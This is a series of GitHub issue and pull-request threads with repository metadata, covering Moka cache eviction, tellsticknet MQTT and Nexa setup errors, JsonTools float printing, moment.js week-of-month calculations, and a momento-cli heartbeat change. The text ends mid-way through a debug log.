Documents doubts and improvements requests Hi, First, thanks for the initiative, i also have used the old nestjs-zod and had no idea it were fully discontinued. Does your generator uses the same structure than nest-zod-prisma ? Would be nice to have it better described on how to use it Hi, I am very sorry I didn't see your Issue Yes,It uses the same generator but I have applied some improvements described in the docs such as nullable and nullish, and repeated Enum import in schemas and so on I actually would love to write a good description but I really don't have a lot of time for now, So I would appreciate any PR If you needed any more information about the package you can reach me in a discord call and I would love to explain what is foggy for you so you can PR here. appreciate it! @yangricardo @timseriakov Tho I think it is more clear with this changes I made to the README Please check that so I can close this
2025-04-01T06:39:39.428547
2024-01-19T01:10:19
2089370123
{ "authors": [ "agiuliano", "tatsuya6502", "unikzforce" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8661", "repo": "moka-rs/moka", "url": "https://github.com/moka-rs/moka/issues/379" }
gharchive/issue
Add an example to show how to run pending tasks in an interval Split from https://github.com/moka-rs/moka/issues/349#issuecomment-1819114103 Hi. It does not have to be run_pending_tasks method, but you need to call some of the cache methods such as get, get_with, insert, or remove to drive eviction_listener. Before v0.12.0, Moka had its own global thread pool to periodically run pending tasks. Some users did not like it, so we removed it. You will find more details here when pending tasks (internal maintenance tasks) will be executed: https://github.com/moka-rs/moka/blob/main/MIGRATION-GUIDE.md#the-maintenance-tasks but i want the eviction_listener() to be called exactly at the time of eviction, not some time later, can you please help me to understand what should i do? You can spawn a thread and make it to call run_pending_tasks with some interval (e.g. 0.1 secs). If you need some code samples, I could write one for you. CC: @unikzforce Thanks Hi! would it be good to add in the public doc about this behavior when it's described how to create an eviction listener? I feel it'd be good to say explicitly that the listener is not called automatically but it's linked to some cache operations, and perhaps bring the section in https://github.com/moka-rs/moka/blob/main/MIGRATION-GUIDE.md#the-maintenance-tasks to the pub doc as well?
2025-04-01T06:39:39.472159
2018-08-22T22:21:46
353147707
{ "authors": [ "mannerydhe", "molobrakos" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8662", "repo": "molobrakos/tellsticknet", "url": "https://github.com/molobrakos/tellsticknet/issues/12" }
gharchive/issue
Problem getting started Hi, This looks awesome and I'd love getting it up and running. Please tell me if I'm missing something. I've compiled it using make under Linux. Everything checks out OK and I can properly discover my Tellsticknet on the network running the command python3 -m tellsticknet -vv discover That's about it. I want to use it in conjunction with Home Assistanst using the mqtt option. However, I run into the following problems: Using the provided example configuration, the command python3 -m tellsticknet -vv devices throws the following error: 18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/tellsticknet.conf 18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/.tellsticknet.conf 18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf - Door Traceback (most recent call last): File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main "__main__", mod_spec) File "/usr/lib/python3.6/runpy.py", line 85, in _run_code exec(code, run_globals) File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 162, in <module> for e in (e for e in read_config() if e['class'] == 'command'): File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 162, in <genexpr> for e in (e for e in read_config() if e['class'] == 'command'): KeyError: 'class' Commenting out the class setting nor deleting it resolves the issue. 2. Trying to turn on a light (using the house and unit from telldus live), python3 -m tellsticknet -vv send protocol=arctech model=selflearning house=5092673 unit=1 cmd=turnon throws the following error: 18-08-22 23:59.29 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf method not found Doesn't matter if cmd=on, ON, turnon, turnoff etc. same result. Trying to connect to a local mqtt broker using python3 -m tellsticknet -vv mqtt with .config/mosquitto_pub containing the following information: -h localhost -p 1883 -username test -pw test results in the following error: 18-08-23 00:07.58 DEBUG (MainThread) [tellsticknet.mqtt] Connecting Traceback (most recent call last): File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main "__main__", mod_spec) File "/usr/lib/python3.6/runpy.py", line 85, in _run_code exec(code, run_globals) File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 208, in <module> run(config, host=host) File "/home/homeassistant/tellsticknet_api/tellsticknet/mqtt.py", line 574, in run port=int(credentials['port'])) File "/usr/local/lib/python3.6/dist-packages/paho_mqtt-1.3.1-py3.6.egg/paho/mqtt/client.py", line 768, in connect return self.reconnect() File "/usr/local/lib/python3.6/dist-packages/paho_mqtt-1.3.1-py3.6.egg/paho/mqtt/client.py", line 927, in reconnect sock.do_handshake() File "/usr/lib/python3.6/ssl.py", line 1068, in do_handshake self._sslobj.do_handshake() File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake self._sslobj.do_handshake() ConnectionResetError: [Errno 104] Connection reset by peer I can sucessfully publish to the mqtt broker using Node-red. I'm suspecting that I'm missing something crucial here since you've got it running just fine. Looking forward to your response. Happy to hear you want to use my code, thanks for testing and finding bugs! Is fixed here I noticed that I actually never implemented specifying params on the command line this way. Clarified it now. If you have a valid config file you should be able to do tellsticknet send livingroom on, tellsticknet send kitchen dim 50, etc. I believe this is because the code currently only supports connecting to the MQTT broker using SSL. I'm running my broker with SSL enabled on port 8883 and it works. So your options are to enable non-SSL in the client code (should not be to hard), or to enable SSL in your MQTT broker. Thank you for the quick response! Are Nexa switches supported? Trying to turn on a Nexa switch using the device name throws an error about not finding "nexa.encode". I can provide you a debug log when I get home. Here is the log as promised: 18-08-23 20:35.09 INFO (MainThread) [tellsticknet.discovery] Discovering tellstick devices ... 18-08-23 20:35.09 INFO (MainThread) [tellsticknet.discovery] Found TellStickNet device with firmware 17 at <IP_ADDRESS> 18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.controller] creating controller with address <IP_ADDRESS> (ACCA5400218D) 18-08-23 20:35.09 DEBUG (SenderThread) [tellsticknet.controller] Waiting for command forever 18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/tellsticknet.conf 18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/.tellsticknet.conf 18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf 18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.controller] Sending time 1 18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.protocol] Encoding for protocol nexa Traceback (most recent call last): File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main "__main__", mod_spec) File "/usr/lib/python3.6/runpy.py", line 85, in _run_code exec(code, run_globals) File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 203, in <module> controller.execute(device, method, param=param) File "/home/homeassistant/tellsticknet_api/tellsticknet/controller.py", line 135, in execute self._execute(device, method, param) File "/home/homeassistant/tellsticknet_api/tellsticknet/controller.py", line 115, in _execute packet = encode(**device, method=method, param=param) File "/home/homeassistant/tellsticknet_api/tellsticknet/protocol.py", line 314, in encode return protocol.encode(**device) AttributeError: module 'tellsticknet.protocols.nexa' has no attribute 'encode' Should python3 -m tellsticknet -vv listen generate something more than this? 18-08-23 20:37.59 INFO (MainThread) [tellsticknet.discovery] Discovering tellstick devices ... 18-08-23 20:37.59 INFO (MainThread) [tellsticknet.discovery] Found TellStickNet device with firmware 17 at <IP_ADDRESS> 18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] creating controller with address <IP_ADDRESS> (ACCA5400218D) 18-08-23 20:37.59 DEBUG (SenderThread) [tellsticknet.controller] Waiting for command forever 18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] Listening for signals from <IP_ADDRESS> 18-08-23 20:37.59 INFO (MainThread) [tellsticknet.controller] Registering self as listener for device at <IP_ADDRESS> 18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] Sending packet to controller <IP_ADDRESS>:42314 <b'B:reglistener'> Have you specified protocol, model, house, unit in tellsticknet.conf? Like: controller: abc123 name: Sovrum component: light protocol: arctech model: selflearning unit: 15 house: 45213512 --- ... etc You can find out what parameters to use by starting tellsticknet -vv listen and then start pressing buttons on your Nexa controller. Then you should get decoded packets displayed in the console. Great! I got it working with one of my Nexa switches. The one I got working is just a regular power outlet. I've got another Nexa device supposed to be mounted behind a regular wall switch which doesn't work. It's called "self-learning Pro" in Telldus live. Any idea? Have you tried Jula's Anslut? Sorry for all the questions. When I get the time I'll try to sniff out the packages sent from Telldus live to the Tellstick and compare them. Ok, I ended up programming it myself using Node-red. Analysing the packages sent using tcpdump I found that Nexa Pro and Julia are the same and very similar to Nexa (built-in arctech). The Nexa (arctech) house code is 26 bits and Jula's/Nexa Pro are 26 bits and has to end in 10. Telldus live had a problem early on where Jula's Anslut wouldn't work if you didn't pick a house code which ended in 10(binary). It seems like if the house code doesn't end correctly it just zero pads it to 24 bits and adds 10 to the end of it, making it 26 bits. Closing for now. Feel free to provide suggestions for changes as PRs.
2025-04-01T06:39:39.482456
2024-10-22T14:58:51
2605718482
{ "authors": [ "KeanuTang", "molsonkiko" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8663", "repo": "molsonkiko/JsonToolsNppPlugin", "url": "https://github.com/molsonkiko/JsonToolsNppPlugin/issues/81" }
gharchive/issue
Weird Decimal Conversion Issue Here's a simple scenario. I have the following Json: {"Amount": 11.11} When I run "Pretty-print current JSON file", the number changes from 11.11 to 11.109999999999999. This is not a bug per se, but rather an unfortunate consequence of my fix to #78. Since loss of precision (that issue) means unrecoverable and unnecessary loss of information, whereas your issue is merely an unnecessarily ugly string representation of a number, I will leave this unfixed. If you're confused, I recommend that you Google "floating point imprecision" to help you understand why some imprecision is unavoidable. It seems fundamentally wrong that a plugin that is supposed to "pretty print" Json ends up manipulating the json data. That means that I can't use and trust your plugin's output because this is absolutely not just an "ugly string representation." 11..11 and 11.1099999xxx are completely different numbers, and "close enough" does not work in the real world of business and science. @KeanuTang I recommend that you stop wasting your breath chiding me for this issue. I will not fix it myself, because as I already explained I don't believe that the alternative solutions are acceptable or feasible to implement, as they involve (a) massive refactoring and loss of performance to pivot from double-precision floating point numbers to decimal numbers, (b) loss of precision when pretty-printing other numbers and thus a regression on #78, or (c) implementing my own (undoubtedly bug-ridden) algorithm that somehow fixes your issue while still using doubles. You are welcome to submit a PR that would fix this issue, but don't be surprised if I reject it because I don't like the tradeoffs you made. There are other JSON plugins you can try if you don't like this one. There is a strong likelihood that they will have the same issue that mine does, because almost everyone uses double-precision floating point number to represent real numbers because, again, the alternative solutions are much harder to use and less performant. The reason I said this is not a bug in my original commend is that 11.11 is not "close enough" to 11.109999999999999 as far as double-precision floating point numbers are concerned; it is equal. By contrast, the earlier algorithm I was using was changing the string representation in a way that would be parsed to a non-equal double. Decimals are not a reasonable substitute because the maximum value for a decimal is far less (7.9e28) than the maximum value for a double (1.8e308). Any alternative with no rounding errors for any number of reasonable size would require me to fish for some third-party library that provides a higher-precision numeric specification while still having comparable performance and memory usage to doubles and an equally generous range of acceptable values, and then tediously change every double parameter, return type, and variable initialization in the entire plugin to the different type. But be warned; that plugin also uses doubles to represent real numbers, and I have no idea how their double-to-decimal and decimal-to-double algorithms compare to the one I'm using. They may be strictly better, or it may just make a different set of tradeoffs than the one I'm using. Regardless, since they use the same data type, they are subject to the same fundamental limitations as my plugin. The only thing I know for sure is that if I try to implement these conversion algorithms myself, I will almost certainly do a worse job than the standard library and introduce many subtle bugs. If you think you can do a better job than the C# standard library, or point me to a library that you are extremely confident does better than the standard library, I would consider a fix. @KeanuTang This commit should address this issue. If you follow my instructions for downloading an unreleased version, you can test out this fix and see if it is too your liking. As I noted in the changelog, this fix comes at the cost of noticeably worse performance when reformatting very large files (say, several megabytes or more). At some point I will see if I can implement a more performant solution. Please let me know if you have any thoughts. If you are satisfied with this fix, I will be including it in v8.2 of JsonTools, which I aim to release in the next few weeks. I must extend my sincerest apology to you for effectively gaslighting you and trying to trivialize what was in fact a real and substantial issue with my plugin. JsonTools version 8.2, incorporating a fix for this issue, is now live. I will soon submit a PR to include v8.2 in the plugins manager.
2025-04-01T06:39:39.510521
2020-05-18T01:39:04
619849912
{ "authors": [ "AsimNet", "johnberry09", "momander" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8664", "repo": "momander/wheel-spinner", "url": "https://github.com/momander/wheel-spinner/issues/6" }
gharchive/issue
[feat] [while spin] Show the nams in plain text Hello 👋 Thanks for the great work! Is it possible to shuffle the names above the wheel in plain text? Because when we add +200 name, you won't be able to read the names from the wheel. https://youtu.be/yL5clbrvmyY?t=480 Thanks Thank you for the proposal, Asim! Could add some more details? I don't think I understand, but i would like to. On Sun, May 17, 2020 at 6:39 PM Asim M Al Twijry<EMAIL_ADDRESS>wrote: Hello 👋 Thanks for the great work! Is it possible to shuffle the names above the wheel in plain text? Because when we add +200 name, you won't be able to read the names from the wheel. https://youtu.be/yL5clbrvmyY?t=480 Thanks — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/momander/wheel-spinner/issues/6, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAD2AIJUP3CV6464GS6IQVLRSCGUHANCNFSM4NDU4F7Q . Here's an example https://drive.google.com/file/d/1Ewh_kkJ98dipRevxCilRH2a8KeqUK7iT/view?usp=drivesdk On Mon, 18 May 2020, 05:18 Martin Omander<EMAIL_ADDRESS>wrote: Thank you for the proposal, Asim! Could add some more details? I don't think I understand, but i would like to. On Sun, May 17, 2020 at 6:39 PM Asim M Al Twijry<EMAIL_ADDRESS> wrote: Hello 👋 Thanks for the great work! Is it possible to shuffle the names above the wheel in plain text? Because when we add +200 name, you won't be able to read the names from the wheel. https://youtu.be/yL5clbrvmyY?t=480 Thanks — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/momander/wheel-spinner/issues/6, or unsubscribe < https://github.com/notifications/unsubscribe-auth/AAD2AIJUP3CV6464GS6IQVLRSCGUHANCNFSM4NDU4F7Q . — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/momander/wheel-spinner/issues/6#issuecomment-629909724, or unsubscribe https://github.com/notifications/unsubscribe-auth/AA3U36LQXRS6GM2FLY6HCBLRSCLGFANCNFSM4NDU4F7Q . Ah, very good, now I get it. Thank your for sending this! I think it looks great. Will add it to the list of things to build next. On Sun, May 17, 2020 at 8:02 PM Asim M Al Twijry<EMAIL_ADDRESS>wrote: Here's an example https://drive.google.com/file/d/1Ewh_kkJ98dipRevxCilRH2a8KeqUK7iT/view?usp=drivesdk On Mon, 18 May 2020, 05:18 Martin Omander<EMAIL_ADDRESS>wrote: Thank you for the proposal, Asim! Could add some more details? I don't think I understand, but i would like to. On Sun, May 17, 2020 at 6:39 PM Asim M Al Twijry < <EMAIL_ADDRESS> wrote: Hello 👋 Thanks for the great work! Is it possible to shuffle the names above the wheel in plain text? Because when we add +200 name, you won't be able to read the names from the wheel. https://youtu.be/yL5clbrvmyY?t=480 Thanks — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/momander/wheel-spinner/issues/6, or unsubscribe < https://github.com/notifications/unsubscribe-auth/AAD2AIJUP3CV6464GS6IQVLRSCGUHANCNFSM4NDU4F7Q . — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub < https://github.com/momander/wheel-spinner/issues/6#issuecomment-629909724 , or unsubscribe < https://github.com/notifications/unsubscribe-auth/AA3U36LQXRS6GM2FLY6HCBLRSCLGFANCNFSM4NDU4F7Q . — You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/momander/wheel-spinner/issues/6#issuecomment-629920018, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAD2AINVBRJ5MJYBTXV6SETRSCQM3ANCNFSM4NDU4F7Q . The Wheel has a method getNameAtPointer(). Naive approach would be to call a function at an interval and update DOM innerText, depending upon the interval, the value will not be in exact sync with entry at the pointer. Also updating DOM innerText too frequently will have performance implications. A slightly better performance approach would be to raise events as the value at pointer changes, however, this will still have issues at the high speed of wheel rotating. Unless the values are not updated at high speed and only updated at certain low speed. The correct way to solve this would be to use the same animation approach used to spin the wheel. That way both the name at the pointer and the name value will be always in sync, as the browser paints them. Excellent analysis, johnberry09! Thank you.
2025-04-01T06:39:39.539356
2016-02-01T02:48:47
130237768
{ "authors": [ "Assem-Hafez", "InstanceOfMichael", "Knjaz89", "M7Arman", "behrangsa", "bonesoul", "daniaaalarshad", "eitanfr", "michaelhayman", "mj1856", "samslow" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8665", "repo": "moment/moment", "url": "https://github.com/moment/moment/issues/2934" }
gharchive/issue
Possible to get week number relative to month? week() returns the week number according to year, what i'd like to get is week number relative to month. Is it possible? It's not built-in, but basically you can subtract the week number of the start of the month from the week number of the date in question. function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } Note that week function is locale specific, so in some cases you might want to use isoWeek instead. (See the docs). If someone wants to add this to moment, a PR with the above function (or similar) and related unit tests would be appreciated. Tracking in PR #2965. Thanks! What about adding this ability to format function? It's not built-in, but basically you can subtract the week number of the start of the month from the week number of the date in question. function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } Note that week function is locale specific, so in some cases you might want to use isoWeek instead. (See the docs). moment("2018-12-31") -> weekOfMonth = -48 In some years week() will return 1 for the last days of the year, see #4019. So it messes up the calculations as @Knjaz89 mentioned. Therefore the right way to calculate the weekOfMonth is: function weekOfMonth(date) { let weekInYearIndex = date.week(); if (date.year() !== date.weekYear()) { weekInYearIndex = date.clone().subtract(1,'week').week() + 1; } const weekIndex = weekInYearIndex - moment(date).startOf('month').week() + 1; } weekOfMonth(moment('2018-12-31T00:00:00.000Z')); // return 6 weekOfMonth(moment('2019-01-01T00:00:00.000Z')); // return 1 It up a 2020, weekly index it was difficult to calculate the number, but settled with the help of the @eitanfr Thank you. I did it in this way: const weekOfMonth = (date) => { const dayInMonth = moment(date).date(); return Math.floor(dayInMonth / 7); } In some years week() will return 1 for the last days of the year, see #4019. So it messes up the calculations as @Knjaz89 mentioned. Therefore the right way to calculate the weekOfMonth is: function weekOfMonth(date) { let weekInYearIndex = date.week(); if (date.year() !== date.weekYear()) { weekInYearIndex = date.clone().subtract(1,'week').week() + 1; } const weekIndex = weekInYearIndex - moment(date).startOf('month').week() + 1; } weekOfMonth(moment('2018-12-31T00:00:00.000Z')); // return 6 weekOfMonth(moment('2019-01-01T00:00:00.000Z')); // return 1 For 02.01.2020 it will return -52, so I fixed that case: function getWeekOfMonth(dateObj) { const date = m(dateObj); const weekInYear = date.isoWeek(); const result = weekInYear - date.startOf('month').isoWeek(); return result < 0 ? weekInYear : result; } It's not built-in, but basically you can subtract the week number of the start of the month from the week number of the date in question. function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } Note that week function is locale specific, so in some cases you might want to use isoWeek instead. (See the docs). Awesome (y) FYI @M7Arman doesn't work for 2020-08-30, your function reports week 4, but we're in week 6. FYI @M7Arman doesn't work for 2020-08-30, your function reports week 4, but we're in week 6. @michaelhayman you mean we are in week 5 ? This doesn't work if the last week of month is common with next yeah e.g. 31 Dec 2020 is Tuesday and its is considered week 1 in the new year. this was my solution to the problem ` function getWeekIndexInMonth(day) { const startOfMonth = moment(day).startOf('month'); const endOfMonth = moment(day).endOf('month'); let currentMomentDate = moment(startOfMonth); const weeks = []; while (currentMomentDate.isBefore(endOfMonth)) { weeks.push(currentMomentDate.week()); currentMomentDate.add(1, "weeks").startOf("week"); } return weeks.indexOf(day.week()) } ` function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } Just FYI, if I don't set the locale I get unexpected results. Here's an example where I don't set the locale and I get unexpected results (negative week of months): import moment from "moment"; function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } const m = moment(); m.set({year: 2021, month: 11, date: 1}); // (months are 0-based, days are 1-based) const decNumDays = m.daysInMonth(); console.log("Number of days in December:", decNumDays); const result = []; for (let date = 1; date <= decNumDays; date++) { m.set('date', date); result.push({ dayName: m.format("dddd"), dayOfMonth: date, weekOfMonth: weekOfMonth(m) }) } console.log(result) Result: [ { dayName: 'Wednesday', dayOfMonth: 1, weekOfMonth: 1 }, { dayName: 'Thursday', dayOfMonth: 2, weekOfMonth: 1 }, { dayName: 'Friday', dayOfMonth: 3, weekOfMonth: 1 }, { dayName: 'Saturday', dayOfMonth: 4, weekOfMonth: 1 }, { dayName: 'Sunday', dayOfMonth: 5, weekOfMonth: 2 }, { dayName: 'Monday', dayOfMonth: 6, weekOfMonth: 2 }, { dayName: 'Tuesday', dayOfMonth: 7, weekOfMonth: 2 }, { dayName: 'Wednesday', dayOfMonth: 8, weekOfMonth: 2 }, { dayName: 'Thursday', dayOfMonth: 9, weekOfMonth: 2 }, { dayName: 'Friday', dayOfMonth: 10, weekOfMonth: 2 }, { dayName: 'Saturday', dayOfMonth: 11, weekOfMonth: 2 }, { dayName: 'Sunday', dayOfMonth: 12, weekOfMonth: 3 }, { dayName: 'Monday', dayOfMonth: 13, weekOfMonth: 3 }, { dayName: 'Tuesday', dayOfMonth: 14, weekOfMonth: 3 }, { dayName: 'Wednesday', dayOfMonth: 15, weekOfMonth: 3 }, { dayName: 'Thursday', dayOfMonth: 16, weekOfMonth: 3 }, { dayName: 'Friday', dayOfMonth: 17, weekOfMonth: 3 }, { dayName: 'Saturday', dayOfMonth: 18, weekOfMonth: 3 }, { dayName: 'Sunday', dayOfMonth: 19, weekOfMonth: 4 }, { dayName: 'Monday', dayOfMonth: 20, weekOfMonth: 4 }, { dayName: 'Tuesday', dayOfMonth: 21, weekOfMonth: 4 }, { dayName: 'Wednesday', dayOfMonth: 22, weekOfMonth: 4 }, { dayName: 'Thursday', dayOfMonth: 23, weekOfMonth: 4 }, { dayName: 'Friday', dayOfMonth: 24, weekOfMonth: 4 }, { dayName: 'Saturday', dayOfMonth: 25, weekOfMonth: 4 }, { dayName: 'Sunday', dayOfMonth: 26, weekOfMonth: -47 }, { dayName: 'Monday', dayOfMonth: 27, weekOfMonth: -47 }, { dayName: 'Tuesday', dayOfMonth: 28, weekOfMonth: -47 }, { dayName: 'Wednesday', dayOfMonth: 29, weekOfMonth: -47 }, { dayName: 'Thursday', dayOfMonth: 30, weekOfMonth: -47 }, { dayName: 'Friday', dayOfMonth: 31, weekOfMonth: -47 } ] And here's an example where I get correct results when I set the locale: import moment from "moment"; moment.locale('en-au'); function weekOfMonth(m) { return m.week() - moment(m).startOf('month').week() + 1; } const m = moment(); m.set({year: 2021, month: 11, date: 1}); // (months are 0-based, days are 1-based) const decNumDays = m.daysInMonth(); console.log("Number of days in December:", decNumDays); const result = []; for (let date = 1; date <= decNumDays; date++) { m.set('date', date); result.push({ dayName: m.format("dddd"), dayOfMonth: date, weekOfMonth: weekOfMonth(m) }) } console.log(result) Result: [ { dayName: 'Wednesday', dayOfMonth: 1, weekOfMonth: 1 }, { dayName: 'Thursday', dayOfMonth: 2, weekOfMonth: 1 }, { dayName: 'Friday', dayOfMonth: 3, weekOfMonth: 1 }, { dayName: 'Saturday', dayOfMonth: 4, weekOfMonth: 1 }, { dayName: 'Sunday', dayOfMonth: 5, weekOfMonth: 2 }, { dayName: 'Monday', dayOfMonth: 6, weekOfMonth: 2 }, { dayName: 'Tuesday', dayOfMonth: 7, weekOfMonth: 2 }, { dayName: 'Wednesday', dayOfMonth: 8, weekOfMonth: 2 }, { dayName: 'Thursday', dayOfMonth: 9, weekOfMonth: 2 }, { dayName: 'Friday', dayOfMonth: 10, weekOfMonth: 2 }, { dayName: 'Saturday', dayOfMonth: 11, weekOfMonth: 2 }, { dayName: 'Sunday', dayOfMonth: 12, weekOfMonth: 3 }, { dayName: 'Monday', dayOfMonth: 13, weekOfMonth: 3 }, { dayName: 'Tuesday', dayOfMonth: 14, weekOfMonth: 3 }, { dayName: 'Wednesday', dayOfMonth: 15, weekOfMonth: 3 }, { dayName: 'Thursday', dayOfMonth: 16, weekOfMonth: 3 }, { dayName: 'Friday', dayOfMonth: 17, weekOfMonth: 3 }, { dayName: 'Saturday', dayOfMonth: 18, weekOfMonth: 3 }, { dayName: 'Sunday', dayOfMonth: 19, weekOfMonth: 4 }, { dayName: 'Monday', dayOfMonth: 20, weekOfMonth: 4 }, { dayName: 'Tuesday', dayOfMonth: 21, weekOfMonth: 4 }, { dayName: 'Wednesday', dayOfMonth: 22, weekOfMonth: 4 }, { dayName: 'Thursday', dayOfMonth: 23, weekOfMonth: 4 }, { dayName: 'Friday', dayOfMonth: 24, weekOfMonth: 4 }, { dayName: 'Saturday', dayOfMonth: 25, weekOfMonth: 4 }, { dayName: 'Sunday', dayOfMonth: 26, weekOfMonth: 5 }, { dayName: 'Monday', dayOfMonth: 27, weekOfMonth: 5 }, { dayName: 'Tuesday', dayOfMonth: 28, weekOfMonth: 5 }, { dayName: 'Wednesday', dayOfMonth: 29, weekOfMonth: 5 }, { dayName: 'Thursday', dayOfMonth: 30, weekOfMonth: 5 }, { dayName: 'Friday', dayOfMonth: 31, weekOfMonth: 5 } ]
2025-04-01T06:39:39.543223
2018-07-27T09:44:50
345161377
{ "authors": [ "coveralls", "kylekatarnls", "marwahaha" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8666", "repo": "moment/moment", "url": "https://github.com/moment/moment/pull/4719" }
gharchive/pull-request
Fix inconsistent output on new year Comparing last week of year N and first week of year N+1 produced wrong result Coverage remained the same at 94.647% when pulling 9844b4476ef1a63f9ece2dde061d685aa75cc1fb on kylekatarnls:patch-2 into 2e2a5b35439665d4b0200143d808a7c26d6cd30f on moment:develop. @kylekatarnls - please add a test case documenting what you are trying to change. You get inconsistency on year overlap: moment('2017-12-31').locale('ja').calendar(moment('2018-01-03')) // "日曜日 00:00" moment('2018-01-06').locale('ja').calendar(moment('2018-01-09')) // "先週土曜日 00:00" Both should return "先週土曜日 00:00" You can see on this PR the week comparison is currently done with < which fails for 52(2017) < 1(2018)
2025-04-01T06:39:39.546567
2024-04-30T03:50:53
2270445171
{ "authors": [ "momento-github-actions-machine-user" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8667", "repo": "momentohq/client-sdk-ruby", "url": "https://github.com/momentohq/client-sdk-ruby/pull/169" }
gharchive/pull-request
chore(main): release momento 0.4.9 :robot: I have created a release beep boop 0.4.9 (2024-04-30) Bug Fixes remove token and specify email for the redundant tag (#168) (c119376) This PR was generated with Release Please. See documentation. :robot: Release is at https://github.com/momentohq/client-sdk-ruby/releases/tag/momento/v0.4.9 :sunflower:
2025-04-01T06:39:39.549455
2023-02-16T00:49:23
1586814519
{ "authors": [ "kvcache" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8668", "repo": "momentohq/momento-cli", "url": "https://github.com/momentohq/momento-cli/pull/259" }
gharchive/pull-request
chore: add heartbeat support Bumping the SDK version for heartbeart support. Interrupted will now happen for this class of timeout instead of a stream read error. Here's a fresh subscription receiving a heartbeat on subscribe: $ momento -p alpha topic subscribe asd --cache roflmao --verbose [2023-02-16T00:42:56Z DEBUG momento::utils::user] Token already expired at: 2022-06-02 23:54:38 UTC [2023-02-16T00:42:56Z DEBUG momento::utils::user] No session found in .momento_session profile... [2023-02-16T00:42:56Z DEBUG rustls::anchors] add_parsable_certificates processed 166 valid and 0 invalid certs [2023-02-16T00:42:56Z DEBUG hyper::client::connect::dns] resolving host="cache.cell-alpha-dev.preprod.a.momentohq.com" [2023-02-16T00:42:56Z DEBUG hyper::client::connect::http] connecting to <IP_ADDRESS>:443 [2023-02-16T00:42:56Z DEBUG hyper::client::connect::http] connected to <IP_ADDRESS>:443 [2023-02-16T00:42:56Z DEBUG rustls::client::hs] No cached session for DnsName(DnsName(DnsName("cache.cell-alpha-dev.preprod.a.momentohq.com"))) [2023-02-16T00:42:56Z DEBUG rustls::client::hs] Not resuming any session [2023-02-16T00:42:56Z DEBUG rustls::client::hs] Using ciphersuite Tls13(Tls13CipherSuite { suite: TLS13_AES_256_GCM_SHA384, bulk: Aes256Gcm }) [2023-02-16T00:42:56Z DEBUG rustls::client::tls13] Not resuming [2023-02-16T00:42:56Z DEBUG rustls::client::tls13] TLS1.3 encrypted extensions: [Protocols([PayloadU8([104, 50])])] [2023-02-16T00:42:56Z DEBUG rustls::client::hs] ALPN protocol is Some(b"h2") [2023-02-16T00:42:56Z DEBUG h2::client] binding client connection [2023-02-16T00:42:56Z DEBUG h2::client] client connection bound [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Settings { flags: (0x0), enable_push: 0, initial_window_size: 2097152, max_frame_size: 16384 } [2023-02-16T00:42:56Z DEBUG h2::proto::connection] Connection; peer=Client [2023-02-16T00:42:56Z DEBUG tower::buffer::worker] service.ready=true message=processing request [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=WindowUpdate { stream_id: StreamId(0), size_increment: 5177345 } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Headers { stream_id: StreamId(1), flags: (0x4: END_HEADERS) } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Data { stream_id: StreamId(1) } [2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Data { stream_id: StreamId(1), flags: (0x1: END_STREAM) } [2023-02-16T00:42:56Z DEBUG rustls::client::tls13] Ticket saved [2023-02-16T00:42:56Z 